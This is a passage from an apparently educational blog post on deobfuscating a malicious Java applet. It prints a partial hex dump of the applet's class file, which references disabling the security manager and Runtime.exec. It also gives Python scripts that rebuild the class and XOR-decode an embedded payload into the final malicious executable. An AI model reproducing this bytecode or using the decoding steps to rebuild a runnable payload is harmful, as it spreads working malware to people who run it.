457863657074696F6E416374696F6E0100136A6176612F696F2F494F4578636
57074696F6E01001E6A6176612F73656375726974792F416363657373436F6E
74726F6C6C657201000C646F50726976696C6567656401003D284C6A6176612
F73656375726974792F50726976696C65676564457863657074696F6E416374
696F6E3B294C6A6176612F6C616E672F4F626A6563743B01000F7072696E745
37461636B54726163650100106A6176612F6C616E672F53797374656D010012
73657453656375726974794D616E6167657201001E284C6A6176612F6C616E6
72F53656375726974794D616E616765723B295601000B67657450726F706572
7479010026284C6A6176612F6C616E672F537472696E673B294C6A6176612F6
C616E672F537472696E673B010008656E647357697468010015284C6A617661
2F6C616E672F537472696E673B295A010006617070656E6401002D284C6A617
6612F6C616E672F537472696E673B294C6A6176612F6C616E672F537472696E
674275696C6465723B010008746F537472696E6701001428294C6A6176612F6
C616E672F537472696E673B01000776616C75654F660100162849294C6A6176
612F6C616E672F496E74656765723B0100116A6176612F6C616E672F52756E7
4696D6501000A67657452756E74696D6501001528294C6A6176612F6C616E67
2F52756E74696D653B01000465786563010028285B4C6A6176612F6C616E672
F537472696E673B294C6A6176612F6C616E672F50726F636573733B01001528
4C6A6176612F6C616E672F537472696E673B295601000A6F70656E537472656
16D01001728294C6A6176612F696F2F496E70757453747265616D3B0100136A
6176612F696F2F496E70757453747265616D010004726561640100032829490
10005636C6F736501000428492956010018284C6A6176612F696F2F496E7075
7453747265616D3B2956010007285B424949294901000577726974650100072
85B424949295601000B746F42797465417272617901000428295B4201000777
616974466F720100146A6176612F696F2F4F757470757453747265616D01000
5285B422956010008696E7456616C75650100096E657874427974657301001B
2843294C6A6176612F6C616E672F537472696E674275666665723B0021003F0
040000100410005000100420043000000010044004300000001004500430000
00010046004300000001004700480000000500010049004A0001004B0000004
3000200020000002F2AB700012A1202B500032A1204B500052A1206B500072A
1208B500092A01B5000A2AB8000B4CA700084C2BB6000DB1000100210026002
9000C00000001004C004D0001004B0000002C00020004000000182A2CB50003
2A2BB5000A2AB8000B4EA700084E2DB6000DB10001000A000F0012000C00000
001004E004F0002004B0000031000070013000002DC01B8000E2AB4000AC700
0501B0120FB800104C2B1211B600129A00232B1213B600129A001ABB001459B
700152BB600161217B80010B60016B600184CBB001459B700151008B80019B8
001AB60016121BB60016B600184DBB001459B700152BB600162CB60016B6001
84E08BC08590310C954590410CB54590510C354590610A25459071091543A04
03360503360615062AB4000ABEA2002C15051904BEA100060336052AB4000A1
5062AB4000A1506331904150533829154840501840601A7FFD02A2D2AB4000A
B7001C100CBD001D3A0603360715071906BEA2000F190615070153840701A7F
FEF03360719061507B8001E04BD001F59032D53B6002053840701BB0021592A
B40003B700223A081908B600233A091909B60024571909B60025A7000A3A081
908B6002707BC0A3A081908031100C04F1908041100A64F1908051100DA4F19
08061100B74FBB001459B700152AB40005B60016BB0028591908032EB70029B
6002AB600162AB40009B60016BB0028591908042EB70029B6002AB600162AB4
0009B60016BB0028591908052EB70029B6002AB600162AB40009B60016BB002
8591908062EB70029B6002AB600162AB40007B60016B600183A09BB002B59BB
0021591909B70022B60023B7002C3A0ABB002D59B7002E3A0B113000BC083A0
C190A190C03190CBEB6002F59360D029F0010190B190C03150DB60030A7FFE4
190BB600313A0E190EBE112000A40053BB001459B700151007B80019B8001AB
60016121BB60016B600183A0FBB001459B700152BB60016190FB60016B60018
3A102A1910190EB7001C19061507B8001E04BD001F5903191053B6002053840
70103360815081906BEA2001A1906150832C6000C1906150832B60032578408
01A7FFE4A700563A081908B6002703360815081906BEA2001A1906150832C60
00C1906150832B6003257840801A7FFE4A7002A3A1103361215121906BEA200
1A1906151232C6000C1906151232B6003257841201A7FFE41911BF01B000050
101012001230026012A026202870026012A026202B300000287028E02B30000
02B302B502B300000000005000000004000100260002005100520002004B000
0001F0003000400000013BB0033592BB700344E2D2CB600352DB60036B10000
0000005000000004000100530009005400550001004B0000009A00040007000
0008E2AB60037BC084CBB003859B700394DBB003A59B7003B4E2C2BB6003C03
360415042BBEA200662B1504331100F07E077A9136052B150433100F7E91360
61505100AA200112D103015056092B6003D57A700112D10411505100A646092
B6003D571506100AA200112D103015066092B6003D57A700112D10411506100
A646092B6003D57840401A7FF992DB6003EB0000000000000

Then, let’s this array back to a .class file and use Java Decompiler later to decompile the .class file. We can create the .class file by using the python script below.

import binascii, sys

def main(szFileName):
    hFile = open(szFileName, "rb")
    szBytes = hFile.readlines()
    hb = binascii.a2b_hex(szBytes[0])
    hFileOut = open("payload.class", "wb")
    hFileOut.write(hb)
    hFileOut.close()
    hFile.close()

if __name__ == "__main__":
    if len(sys.argv) < 1:
        print("Please enter a filename!")
        exit(0)
    main(sys.argv[1])

After running it you should get back something like this:

 

Payload XORing

Payload XORing

Extracting the Malware File

As I’ve mentioned earlier, a Java Thread starts with a run() function, we can see that it’s trying to XOR nlfokjpqhpnjflnd, the payload, with the following XOR keys: -55, -53, -61, -94, -111, and eventually output an .exe file. So what i did was to write this simple python script to XOR nlfokjpqhpnjflnd with this set of XOR keys, -55, -53, -61, -94, -111. As the XOR keys are negative, all I did was a bitwise shift to positive integers: 201, 203, 195, 162, 145. This python script will save the result into an exe, which is the final malware.

import os,sys

def main(szFileName):
    hFile = open(szFileName, "rb")
    payload = bytearray(hFile.read())
    keys = [ 201, 203, 195, 162, 145 ]
    i = 0;
    for j in range(len(payload)):
        if i >= len(keys):
            i = 0
        payload[j] = (payload[j] ^ keys[i]);
        i+=1
    hFileOut = open("payload._exe_", "wb")
    hFileOut.write(payload)
    hFileOut.close()
    hFile.close()

if __name__ == "__main__":
    if len(sys.argv) < 1:
        print("Please enter a filename!")
        exit(0)
    main(sys.argv[1])

If you view it with a hex editor or notepad++, you should see something like this:

Final Payload

Final Payload

Now that you have the final malicious .exe. It’s time for you to start reversing it. :P Have Phun.

BR,

gunther_ar

 

Trackbacks

  1. [...] UIC gives an elementary lesson on how to deobfuscate a malicious Java applet. [...]